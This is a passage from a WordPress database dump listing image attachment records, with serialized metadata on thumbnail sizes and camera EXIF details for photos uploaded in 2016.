:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(502,221,'_wp_attached_file','2016/07/CLT-Panel-2-2.jpg'),(503,221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1242;s:6:\"height\";i:952;s:4:\"file\";s:25:\"2016/07/CLT-Panel-2-2.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-300x230.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-768x589.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:589;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"CLT-Panel-2-2-1024x785.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:785;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:26:\"CLT-Panel-2-2-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:25:\"CLT-Panel-2-2-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(504,225,'_wp_attached_file','2016/03/DSCN2537.jpg'),(505,225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2537.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2537-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2537-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2537-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2537-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2537-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2537-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2537-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2537-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2537-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2537-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2537-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2537-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1432366133\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"28.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:6:\"0.0016\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(506,226,'_wp_attached_file','2016/03/DSCN2724.jpg'),(507,226,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2724.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2724-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2724-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2724-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2724-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2724-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2724-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2724-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2724-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2724-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2724-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2724-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2724-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1436849890\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00321336760925\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(508,227,'_wp_attached_file','2016/03/DSCN3361.jpg'),(509,227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3361.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3361-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3361-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3361-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3361-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3361-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3361-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3361-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3361-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3361-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3361-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3361-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3361-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1459322014\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"15.1\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00341646737274\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(510,228,'_wp_attached_file','2016/03/DSCN3650.jpg'),(511,228,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3650.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3650-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3650-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3650-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3650-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3650-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3650-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3650-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3650-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3650-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3650-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3650-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3650-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1467187689\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00229726625316\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(512,229,'_wp_attached_file','2016/03/DSCN3760.jpg'),(513,229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3760.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3760-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3760-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3760-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3760-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3760-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3760-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3760-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3760-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3760-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3760-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3760-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3760-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1469520861\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"5.9\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0161030595813\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(514,230,'_wp_attached_file','2016/03/DSCN2574.jpg'),(515,230,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2574.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2574-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2574-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2574-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2574-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2574-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2574-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2574-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2574-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2574-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2574-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2574-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2574-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1432875569\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"15.1\";s:3:\"iso\";s:3:\"350\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(516,231,'_wp_attached_file','2016/03/DSCN2583.jpg'),(517,231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2583.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2583-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2583-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2583-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2583-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2583-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2583-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2583-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2583-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2583-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2583-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2583-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2583-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1432942343\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:14:\"0.030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(521,252,'_wp_attached_file','2016/03/DSCN3879.jpg'),(522,252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN3879.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3879-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3879-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3879-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3879-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3879-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3879-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3879-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3879-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3879-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3879-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3879-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3879-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX